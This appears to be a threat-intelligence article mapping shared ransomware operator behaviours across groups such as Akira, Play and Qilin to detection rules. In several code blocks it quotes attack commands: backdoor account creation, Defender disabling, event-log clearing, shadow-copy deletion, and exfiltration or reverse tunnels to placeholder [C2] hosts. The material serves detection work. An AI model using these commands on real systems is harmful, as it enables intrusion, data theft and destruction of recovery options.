The Operator Playbook — Cross-RaaS Behavioral Analysis

*Published: 4/15/2026* > **BLUF:** Across 10+ ransomware operations - Akira, Play, Qilin, Chaos, Embargo, TheGentlemen, Black Basta, LockBit, Fog, Hunters International, RansomHub, Lynx - the same operator behaviors repeat with remarkable consistency. Despite different tooling, different tempo, different sophistication levels, the operators all funnel through the same narrow set of behaviors at every phase of the kill chain. Those bottlenecks are the chokepoints. This article identifies them, shows which groups converge at each one, and maps the detection opportunities that matter most - regardless of what EDR you run. --- ## Why Chokepoints Single-group threat profiles tell you what *one operation does*. Cross-group analysis tells you what *ransomware operators do* - the structural behaviors that persist regardless of which RaaS program is cutting the check. Most detection engineering focuses on the unique: a specific loader's DGA, a custom EDR killer's driver hash, a novel persistence mechanism. That work matters. But the highest-ROI detections target the behaviors that *every operator reaches for* - the commands that appear because they solve universal problems (find domain admins, move laterally, kill backups), not because any particular group is innovative. A chokepoint is a behavior where the operator has no good alternative. They *must* enumerate the domain. They *must* move laterally. They *must* delete shadow copies. The tooling varies, but the options are finite - and at each chokepoint, 3-5 detection signatures cover the entire space. This analysis draws from: - **Firsthand IR telemetry** - 5 intrusions across Akira and Play (documented in [[Three Akira Intrusions Compared]] and [[Two PlayCrypt Intrusions Compared]]) - **Vendor IR reporting** - Sophos Active Adversary Reports (2025, 2026), DFIR Report case studies (Fog, LockBit, BlackSuit, Lynx, multi-affiliate), Huntress 2025 Cyber Threat Report, eSentire TRU (Hunters International) - **Government advisories** - CISA #StopRansomware: Akira (AA24-109A), Play (AA23-352A), Black Basta (AA24-131A), RansomHub (AA24-242a), Rhysida (AA23-319a), Interlock (AA25-203a) The groups span closed operations (Play), open RaaS (Qilin, RansomHub), Conti-lineage (Akira, Chaos), independent operators (TheGentlemen, Payouts King), and state-affiliated actors (Embargo/Storm-0501, Qilin/Moonstone Sleet). The behavioral convergence across this diversity is the point. --- ## Chokepoint 1: Initial Access - The Edge Device Problem Initial access is the most variable phase - but less variable than most people think. The options are: | Vector | Groups Observed | Pattern | |---|---|---| | Compromised VPN/RDP credentials | Akira, Play, Qilin, Chaos, Fog, LockBit, Lynx, Hunters Int'l, Payouts King | Stolen creds or IAB purchase | | Edge device exploitation (FortiOS, SonicWall, Citrix, Exchange) | Akira, Play, Embargo, Fog, Hunters Int'l, Interlock | N-day vulns, not 0-day | | Social engineering (vishing, ClickFix, email spam) | Chaos, Qilin (ScreenConnect supply chain), Black Basta | Human-operated from minute one | | RMM tool abuse (ScreenConnect, SimpleHelp, Atera) | Play (SimpleHelp CVE-2024-57727), Akira (Atera portal) | Trusted tool as attack vector | The chokepoint isn't the specific exploit - it's the fact that all roads lead to one of two outcomes: **a remote interactive session** (RDP, VPN, RMM) or **a web shell/beacon callback**. Both produce detectable artifacts: - **Remote sessions** - Type 10 (RDP) or Type 3 (network) logon events from unexpected sources. The signal is the source, not the session. - **RMM abuse** - AnyDesk, ScreenConnect, Atera, SimpleHelp executing on endpoints where they aren't sanctioned. Sophos 2026 confirms AnyDesk as the most abused RMM tool across all IR cases. - **Edge device compromise** - VPN auth logs showing successful login after brute force burst, or successful auth from impossible geography. The Huntress 2025 report found that **recon commands execute within ~20 minutes of initial access**. The window between access and first detectable post-exploitation behavior is short - but it exists, and it starts with auth log anomalies. > **Detection Opportunity:** Monitor for RDP (Type 10) and network (Type 3) logon events from unmanaged IPs. Detect unsanctioned RMM tool execution via PE metadata. > > See rule: [[edr-win-persist-rmm-deployment]] --- ## Chokepoint 2: Domain Reconnaissance - The Same Five Commands Every ransomware operator needs to answer the same questions: *Where are the domain controllers? Who are the domain admins? What's the network topology?* There are only so many ways to ask. | Command | Groups | Count | |---|---|---| | `nltest /dclist:` or `/domain_trusts` | Akira, Chaos, Embargo, Qilin, Play, Fog, LockBit, Black Basta, RansomHub, Lynx | **10+** | | `net group "Domain Admins" /domain` | Akira, Chaos, Embargo, Qilin, Play, Fog, LockBit, Black Basta, RansomHub, Hunters Int'l | **10+** | | `whoami` / `whoami /user` | Akira, Chaos, Play, Fog, LockBit, BlackSuit, Lynx | **7+** | | SoftPerfect Network Scanner (`netscan.exe`) | Akira, Qilin, Play, TheGentlemen, Fog | **5+** | | AdFind (`adfind.exe`) | Akira, Play, RansomHub | **3+** | | BloodHound / SharpHound | Play, RansomHub, Black Basta | **3+** | `nltest` and `net group "Domain Admins"` are functionally universal. They appear in every CISA advisory, every DFIR Report case, every intrusion we've analyzed. These two commands are the single highest-confidence early indicators of hands-on-keyboard ransomware operator activity. The tools vary in Tier 2 - AdFind vs BloodHound vs PowerView vs custom .NET enumerators (Play's Grixba) - but the Tier 1 commands are invariant because they're built into Windows. No download, no staging, no detection evasion needed. The operator types them from memory. > **Detection Opportunity:** > > See rule(s): [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-adfind-enum]] | [[edr-win-disc-netscan-deployment]] --- ## Chokepoint 3: Credential Access - LSASS Is the Funnel Despite years of EDR investment, LSASS credential dumping remains the single most common credential access technique across ransomware operations. The operator needs domain admin credentials. LSASS has them. Everything funnels through it. | Technique | Groups | Count | |---|---|---| | Mimikatz `sekurlsa::logonPasswords` | Akira, Chaos, Qilin, Play, TheGentlemen, LockBit, Black Basta, RansomHub, Fog | **9+** | | LSASS dump via `comsvcs.dll MiniDump` | Akira, Black Basta, RansomHub | **3+** | | Registry hive dump (`reg save HKLM\SAM`) | Akira, Play, Embargo | **3+** | | Kerberoasting | Akira, Chaos, Play, RansomHub | **4+** | | Veeam credential extraction | Akira, Fog, Hunters International | **3+** | | Browser credential theft (`esentutl.exe /y`) | Akira (2/3 observed intrusions) | Emerging | | Chrome harvest via GPO logon script | Qilin | Novel | | WDigest `UseLogonCredential=1` | Qilin, TheGentlemen | **2+** | The chokepoint: whether the operator uses Mimikatz, `comsvcs.dll`, ProcDump, or a custom tool - they're all accessing `lsass.exe` memory. The process target is the invariant. Monitor for any non-standard process accessing LSASS memory, and you catch 9+ groups with one detection. Veeam credential extraction is the high-value secondary. It appears in fewer groups, but it grants access to backup infrastructure - the operator's primary target for ensuring encryption sticks. > **Detection Opportunity:** > > See rule(s): [[edr-win-cred-lsass-minidump]] | [[edr-win-cred-reg-hive-dump]] | [[edr-win-cred-veeam-db-access]] | [[edr-win-cred-browser-esentutl]] | [[edr-win-cred-ntlm-internal-monologue]] --- ## Chokepoint 4: Persistence - Fewer Options Than You Think Persistence mechanisms look diverse at first glance - every group seems to use different tools. But the underlying Windows mechanisms are a finite, well-known set. The operator needs code to survive a reboot. On Windows, the options are: | Mechanism | Groups | Pattern | |---|---|---| | **Scheduled tasks** (`schtasks`) | Play, Qilin, Embargo, Black Basta | Task creation → payload re-execution | | **Registry Run keys** (`HKLM\...\Run`, `HKCU\...\Run`) | TheGentlemen, Black Basta, RansomHub | Classic autostart persistence | | **New services** (`sc create`) | Akira (nssm.exe as fake "sysmon"), Embargo (`irnagentd`), Play (PsExec services) | Service-based persistence or lateral movement | | **RMM tools** (AnyDesk, ScreenConnect, RustDesk, etc.) | Akira, Chaos, Embargo, Qilin, TheGentlemen, RansomHub | Legitimate tool as persistence | | **IFEO debugger redirects** (Sticky Keys) | TheGentlemen | `sethc.exe` → `cmd.exe` | | **WMI event subscriptions** | Black Basta, RansomHub | WMI filter → consumer → binding | | **DCOM object hijack** | Observed in Cobalt Strike deployments | COM object registration for beacon callback | | **Local account creation** | Akira, Chaos, Play, TheGentlemen, Fog, LockBit | `net user /add` → `localgroup administrators /add` | | **Reverse tunnels** (cloudflared, ngrok, chisel, ligolo) | Akira, Qilin, TheGentlemen | Outbound HTTPS bypasses inbound rules | The chokepoint: all persistence eventually registers itself with the OS through one of ~6 mechanisms: scheduled task, service, registry autostart, WMI subscription, COM object, or startup folder. Each has a well-defined telemetry surface. The *tools* vary endlessly - the *registration points* don't. Local account creation deserves special attention. It appears in at least 6 groups and is often the first persistence mechanism deployed: ``` net user [backdoor_account] [password] /add net localgroup administrators [backdoor_account] /add ``` Scheduled task persistence is the next most common. Observed patterns: ``` schtasks /create /tn "Update" /tr "ssh.exe -R 7777 -p 443 user@[C2]" /sc minute /mo 5 /ru SYSTEM powershell New-ScheduledTaskAction -Execute 'payload.exe' ... Register-ScheduledTask -TaskName '[name]' ``` IFEO debugger redirects (Sticky Keys) provide pre-auth SYSTEM access from the login screen: ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f ``` > **Detection Opportunity:** > > See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]] --- ## Chokepoint 5: Reverse Tunneling - Outbound C2 on a Short List Operators need a command-and-control channel that survives firewall rules. The solution: outbound tunnels over HTTPS or SSH that bypass inbound restrictions. The tool list is short and well-known. | Tool | Groups | Protocol | |---|---|---| | Cloudflared (`cloudflared.exe tunnel run --token`) | Akira | HTTPS tunnel via Cloudflare | | ngrok (`ngrok tcp 3389`) | TheGentlemen, Qilin | HTTPS tunnel, RDP over ngrok | | Chisel | Fog, RansomHub | HTTP/HTTPS tunnel | | Ligolo-ng | Akira | Reverse tunnel, TUN interface | | Reverse SSH (`ssh -R`) | Chaos | SSH tunnel over port 443 | | SystemBC | Play, Qilin | SOCKS5 proxy | | Cobalt Strike Beacon | Akira, Embargo, Play, Qilin, LockBit, Black Basta, Fog | HTTPS malleable C2 | The chokepoint: there are only ~5 widely-used tunneling tools in the ransomware ecosystem. Every one of them is detectable by binary name, PE metadata, or behavioral pattern. Cobalt Strike is the outlier (harder to detect at the network level), but the tunneling tools are easy wins. Observed command patterns: ``` cloudflared.exe tunnel run --token eyJhIjoiNjM2NWUy[...] ngrok config add-authtoken [token] && ngrok tcp 3389 chisel client [C2]:8080 R:socks ssh -R 443:[local_ip]:22 user@[C2] -fN nssm.exe install sysmon C:\ProgramData\ligolo.exe ``` The TheGentlemen toolkit illustrates this well: ngrok batch scripts run `ngrok config add-authtoken` then `ngrok tcp 3389`, tunneling RDP over HTTPS. Two ngrok tokens for redundancy. If ngrok is blocked, RustDesk provides a fallback on an independent relay network. > **Detection Opportunity:** Alert on execution of cloudflared, ngrok, chisel, or ligolo by binary name or PE metadata. These tools have near-zero legitimate use in most enterprise environments. > > See rule: [[edr-win-c2-reverse-tunneling]] --- ## Chokepoint 6: Lateral Movement - Three Roads, One Destination Lateral movement has the tightest convergence of any phase. The operator needs to execute commands on remote hosts. On Windows, there are three roads: ### Road 1: Impacket (WmiExec / SmbExec / AtExec) | Groups | Count | |---|---| | Akira, Chaos, Embargo, Play, Qilin, Fog, LockBit, Black Basta, RansomHub | **9+** | Impacket accounts for **36% of all tools** observed in Sophos 2026 IR cases, with an 83% year-over-year increase. It's the dominant lateral movement framework across the ecosystem. WmiExec's output redirection signature is the single highest-fidelity lateral movement detection available: ``` cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1 ``` The `\\127.0.0.1\ADMIN$\__<float>` pattern is invariant across every group that uses Impacket. It writes command output to a temp file in the ADMIN$ share and reads it back. This generated 16 cases in a single operational queue during one Akira intrusion. SmbExec creates a service on the remote host for command execution. AtExec uses the task scheduler. All three Impacket modules leave distinct process creation artifacts. > **Detection Opportunity:** > > See rule: [[edr-win-lat-impacket-wmiexec]] ### Road 2: PsExec and Variants (PsExec, PAExec, csexec) | Groups | Count | |---|---| | Play, Qilin, Black Basta, LockBit, TheGentlemen | **5+** | PsExec deploys `PSEXESVC.exe` as a service on the remote host, then executes commands through it. The detection surface is Event ID 7045 (new service installed) with: - Random alphanumeric service names (PsExec default) or known service names (`PSEXESVC`) - Binary paths in `C:\Windows\` with random names - Service account: the compromised domain admin PAExec is the open-source alternative. Some groups use csexec (CrackMapExec's variant). Different binary, identical behavioral pattern: remote service creation, command execution, service cleanup. In the Play intrusion we documented, PsExec created 8+ services across 15+ hosts in rapid succession: ``` 7045 | R7KXNQ4VHJ2D | C:\Windows\R7KXNQ4VHJ2D.exe | DOMAIN\Administrator 7045 | M3YPWT8FG6AE | C:\Windows\M3YPWT8FG6AE.exe | DOMAIN\Administrator 7045 | J9BHZC5NLR1X | C:\Windows\J9BHZC5NLR1X.exe | DOMAIN\Administrator ``` Random 12-character alphanumeric service names. Each service dropped a unique ransomware binary to `C:\Users\Public\Music\`. > **Detection Opportunity:** Event ID 7045 with random service names and binaries in `C:\Windows\` is PsExec's signature. PAExec and csexec produce the same artifact. > > See rule: [[edr-win-lat-remote-psexec]] ### Road 3: RDP and SSH | Groups | Count | |---|---| | Akira, Chaos, Play, Qilin, Embargo, Fog, LockBit, BlackSuit, Lynx, Hunters Int'l | **10+** | RDP is the most abused legitimate tool across the ecosystem - 66% of Sophos 2026 IR cases involved internal RDP lateral movement. It's the hardest chokepoint to detect because it's also the most common legitimate admin tool. The signal isn't "RDP happened" - it's "RDP happened from an unexpected source." Detection requires: 1. Asset inventory - which IPs have EDR agents 2. Auth log correlation - Type 10 logon from unmanaged IP 3. Behavioral baselining - which accounts normally RDP, and to where Operators frequently enable RDP on hosts where it's disabled, creating a second detectable artifact: ``` reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f powershell Enable-NetFirewallRule -DisplayGroup "Remote Desktop" ``` This registry modification + firewall rule change pattern appeared in both Play intrusions, plus Akira and Embargo. SSH lateral movement is less common but growing - Chaos used reverse SSH over port 443, and ESXi-targeting operators use SSH to reach hypervisors. The same principle applies: SSH from a Windows endpoint to an internal host is anomalous in most environments. ### The Lateral Movement Chokepoint Three roads, all detectable. Impacket and PsExec have process-creation signatures. RDP has auth log signatures. Together, these three mechanisms account for the vast majority of observed lateral movement. An operator who can't use any of them is stuck on the beachhead. --- ## Chokepoint 7: Defense Evasion - Everyone Kills Defender The defense evasion phase shows the widest variation in *method* but near-total convergence on *target*: Windows Defender. Every group disables it. They just disagree on how. | Technique | Groups | Count | |---|---|---| | `Set-MpPreference -DisableRealtimeMonitoring` | Akira, Play, Fog, LockBit, Black Basta | **5+** | | Defender registry tampering (`DisableAntiSpyware`, etc.) | Play, TheGentlemen, Embargo, RansomHub | **4+** | | `Set-MpPreference -ExclusionPath` | Akira, Play, TheGentlemen | **3+** | | `mpcmdrun.exe -RemoveDefinitions -All` | Play, TheGentlemen | **2+** | | `wevtutil cl` (event log clearing) | Akira, Chaos, Play, TheGentlemen, Qilin, LockBit | **6+** | | BYOVD EDR killer | Akira (Zemana), Embargo (probmon.sys), Qilin (rwdrv.sys), RansomHub (EDRKillShifter) | **4+** | | `bcdedit /set safeboot network` | Akira, Embargo, Qilin | **3+** | The composite Defender kill sequence, observed across Play, TheGentlemen, and Embargo, looks like this when you stack the commands: ``` Set-MpPreference -DisableRealtimeMonitoring $true reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f Set-MpPreference -ExclusionPath C:\Users\Public\Music mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference -ExclusionExtension .exe ``` And the anti-forensic cleanup: ``` wevtutil cl Security wevtutil cl System wevtutil cl "Windows PowerShell" wevtutil cl "Microsoft-Windows-PowerShell/Operational" ``` Event log clearing via `wevtutil cl` is the most common anti-forensic technique - 6+ groups. Its absence in an intrusion is more notable than its presence. BYOVD-based EDR killers are the emerging trend. Four groups now use kernel-driver-based process termination, each with different drivers. Hash-based detection is useless - the drivers change per deployment. Behavioral detection (driver load + service creation + protected process termination pattern) is the only durable approach. The TheGentlemen toolkit is the extreme case: 6 redundant Defender-killing methods (`dControl.exe`, `ConfigureDefender.exe`, `WinDefGpo_Reg.ps1`, `def1.bat`, `z.bat`, `ExcTool`) - because at least one will succeed against any single EDR configuration. > **Detection Opportunity:** > > See rule(s): [[edr-win-def-defender-tampering]] | [[edr-win-impact-inhibit-recovery]] --- ## Chokepoint 8: Exfiltration - The Staging-Transfer Pattern Exfiltration follows a two-step pattern across every group: **stage with an archiver, transfer with a sync tool**. The archiver and transfer tool vary, but the pattern is invariant. ### Step 1: Staging | Tool | Groups | Count | |---|---|---| | WinRAR (`-ep1 -scul -r0`) | Akira, Play, Qilin, Black Basta, RansomHub | **5+** | | 7-Zip | TheGentlemen, LockBit | **2+** | WinRAR is the most abused archiving tool across Sophos 2026 IR cases. The flag combination is a near-universal staging signature: ``` WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "C:\Data\Share\Finance" WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "C:\Data\Share\Human Resources" ``` Optimized for fast bulk archiving without compression. Alert on WinRAR with `-ep1`, `-scul`, and `-r0` together. ### Step 2: Transfer | Tool | Groups | Count | |---|---|---| | Rclone (often renamed) | Akira, Embargo, Qilin, Fog, RansomHub, Hunters Int'l | **6+** | | WinSCP (SFTP/FTP) | Akira, Play, Qilin, Hunters International | **4+** | | MegaSync / MEGA | Embargo, Qilin | **2+** | | Cyberduck CLI | Qilin | **1** | | GoodSync (renamed `wininit.exe`) | Chaos | **1** | Operators substitute freely between transfer tools. eSentire documented Hunters International trying Rclone first and switching to WinSCP when it was blocked. ``` # Rclone (often renamed) crowdstrike.exe copy --include-from inc.txt "\\FILESERVER\shares" remote:bucket # Akira svhost.exe copy \\FILESERVER\shares remote:mega-bucket --transfers 16 # Embargo # WinSCP winscp.exe /command "open sftp://user@[C2]:16826" "put *.rar" "exit" # Play # Cyberduck cyberduck-cli transfer /target s3://bucket # Qilin ``` Detection via PE metadata (`Rsync for cloud storage`) rather than filename is essential for catching renamed Rclone variants. The chokepoint: regardless of the specific tool, the behavioral pattern is the same - a non-standard process making large outbound transfers to cloud storage or external SFTP. Three detections (WinRAR staging, Rclone metadata, WinSCP command-line) cover the space. > **Detection Opportunity:** > > See rule(s): [[edr-win-exfil-rclone-usage]] | [[edr-win-exfil-winrar-staging]] | [[edr-win-exfil-winscp-transfer]] --- ## Chokepoint 9: Recovery Destruction - Shadow Copies Die First The pre-encryption phase is the most tightly converged of all. Shadow copy deletion is functionally universal - it appears in every group that reaches the encryption phase because it *must*. | Command | Groups | Count | |---|---|---| | `vssadmin delete shadows /all /quiet` | Akira, Chaos, Embargo, Qilin, Play, TheGentlemen, Black Basta, LockBit, Fog, RansomHub | **10+** | | `wmic shadowcopy delete` | Chaos, Embargo, Play, Black Basta | **4+** | | `bcdedit /set recoveryenabled no` | Chaos, Embargo, Qilin, Black Basta | **4+** | | `wbadmin delete catalog` | Chaos, Black Basta | **2+** | | PowerShell `Win32_ShadowCopy \| Remove-WmiObject` | Akira | **1** | | Mass service termination (SQL, Exchange, Hyper-V, Veeam) | TheGentlemen, LockBit, Black Basta | **3+** | `vssadmin delete shadows /all /quiet` is the single most universal ransomware operator command in this dataset. Every group uses it because there's no alternative. If shadow copies survive, the victim can recover without paying. The full recovery destruction sequence, as observed across multiple groups: ``` vssadmin delete shadows /all /quiet wmic shadowcopy delete /nointeractive bcdedit /set {default} recoveryenabled no bcdedit /set {default} bootstatuspolicy ignoreallfailures wbadmin delete catalog -quiet ``` Not every group runs all five. But `vssadmin delete shadows` is invariant. It's the ultimate chokepoint: no substitution, no variation, no evasion. > **Detection Opportunity:** If you detect nothing else, detect this. > > See rule: [[edr-win-impact-inhibit-recovery]] --- ## Tempo - How Fast Do They Move? Dwell time data from vendor reporting reveals a clear trend: operators are getting faster. | Metric | Value | Source | |---|---|---| | Median time to AD compromise | **11 hours** | Sophos Active Adversary 2025 | | Average time-to-ransomware (TTR) | **~17 hours** | Huntress 2025 Threat Report | | Akira / RansomHub TTR | **~6 hours** | Huntress 2025 | | LockBit TTR (Confluence exploit) | **~2 hours** | DFIR Report (CVE-2023-22527) | | Play (observed intrusion) | **~6 hours** | Firsthand IR data | | Time from exfil start to detection | **1.87 hours** | Sophos Active Adversary 2026 | | Ransomware deployed outside business hours | **88%** | Sophos Active Adversary 2026 | | Recon commands after initial access | **~20 minutes** | Huntress 2025 | The implication: **if your detection pipeline takes more than 6 hours to escalate, you're losing to the fastest operators.** The recon-to-credential-access window is often under an hour. The credential-to-lateral-movement window is often under 2 hours. By the time shadow copies are being deleted, you have minutes, not hours. The highest-value detections are the *early* ones - domain enumeration and credential access - not the impact-phase detections that confirm what's already happening. --- ## The Chokepoint Map Nine chokepoints. Each one is a behavioral bottleneck where the operator has no good alternative. Together, they provide detection coverage across the full kill chain. | # | Chokepoint | Behavior | Groups | |---|---|---|---| | 1 | Recovery Destruction | `vssadmin delete shadows` | 10+ | | 2 | Domain Recon | `nltest /dclist` / `/domain_trusts` | 10+ | | 3 | Domain Recon | `net group "Domain Admins" /domain` | 10+ | | 4 | Lateral Movement | Impacket WmiExec output redirection | 9+ | | 5 | Credential Access | LSASS memory access (any method) | 9+ | | 6 | Lateral Movement | PsExec / PAExec remote service creation | 5+ | | 7 | Exfiltration | Rclone (any binary name, PE metadata) | 6+ | | 8 | Exfiltration | WinRAR staging (`-ep1 -scul -r0`) | 5+ | | 9 | Exfiltration | WinSCP command-line transfer | 4+ | The exfiltration phase requires three detections because operators substitute freely. No single tool dominates - but at least one of the three appears in every group that documents exfiltration. Beyond the top 9, the next tier of chokepoints - reverse tunneling (cloudflared/ngrok/chisel), RMM tool abuse, Defender tampering, and event log clearing - collectively cover the persistence, C2, and evasion phases with high fidelity. --- ## Detections Open-source Sigma rules covering the chokepoints identified in this analysis: | Rule ID | Description | |---|---| | [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition | | [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest | | [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net | | [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement | | [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll | | [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution | | [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration | | [[edr-win-exfil-winrar-staging]] | WinRAR Data Staging with Exfiltration Flags | | [[edr-win-exfil-winscp-transfer]] | WinSCP Command-Line File Transfer | | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | | [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment | | [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution | | [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration | | [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump | | [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access | | [[edr-win-cred-browser-esentutl]] | Browser Credential Theft via Esentutl | | [[edr-win-cred-ntlm-internal-monologue]] | NTLM Hash Theft via Internal Monologue | --- ## Key Publications 1. [CISA/FBI - #StopRansomware: Akira Ransomware (AA24-109A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) (Apr 2024, updated Nov 2025) 2. [CISA/FBI/ASD - #StopRansomware: Play Ransomware (AA23-352A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a) (Dec 2023, updated Jun 2025) 3. [CISA/FBI - #StopRansomware: Black Basta (AA24-131A)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a) (May 2024) 4. [CISA/FBI - #StopRansomware: RansomHub (AA24-242a)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a) (Aug 2024) 5. [CISA/FBI - #StopRansomware: Interlock (AA25-203a)](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a) (Jul 2025) 6. [Sophos - Nowhere, Man: The 2026 Active Adversary Report](https://www.sophos.com/en-us/blog/2026-sophos-active-adversary-report) (2026) 7. [Sophos - It Takes Two: The 2025 Active Adversary Report](https://news.sophos.com/en-us/2025/04/02/2025-sophos-active-adversary-report/) (Apr 2025) 8. [DFIR Report - Navigating Through the Fog](https://thedfirreport.com/2025/04/28/navigating-through-the-fog/) (Apr 2025) 9. [DFIR Report - Cobalt Strike and a Pair of SOCKS Lead to LockBit](https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/) (Jan 2025) 10. [DFIR Report - Confluence Exploit Leads to LockBit Ransomware](https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/) (Feb 2025) 11. [DFIR Report - Blurring the Lines: Three Ransomware Gangs](https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/) (Sep 2025) 12. [DFIR Report - Cat's Got Your Files: Lynx Ransomware](https://thedfirreport.com/2025/11/17/cats-got-your-files-lynx-ransomware/) (Nov 2025) 13. [Huntress - 2025 Cyber Threat Report](https://www.huntress.com/blog/huntress-2025-cyber-threat-report-proliferating-rats-evolving-ransomware-and-other-findings) (2025) 14. [eSentire - From Access to Encryption: Hunters International](https://www.esentire.com/blog/from-access-to-encryption-dissecting-hunters-internationals-latest-ransomware-attack) (Feb 2025) 15. [ESET - Shifting the Sands of RansomHub's EDRKillShifter](https://www.welivesecurity.com/en/eset-research/shifting-sands-ransomhub-edrkillshifter/) (Mar 2025) 16. [Cisco Talos - Qilin EDR Killer Infection Chain](https://blog.talosintelligence.com/qilin-edr-killer/) (Apr 2026)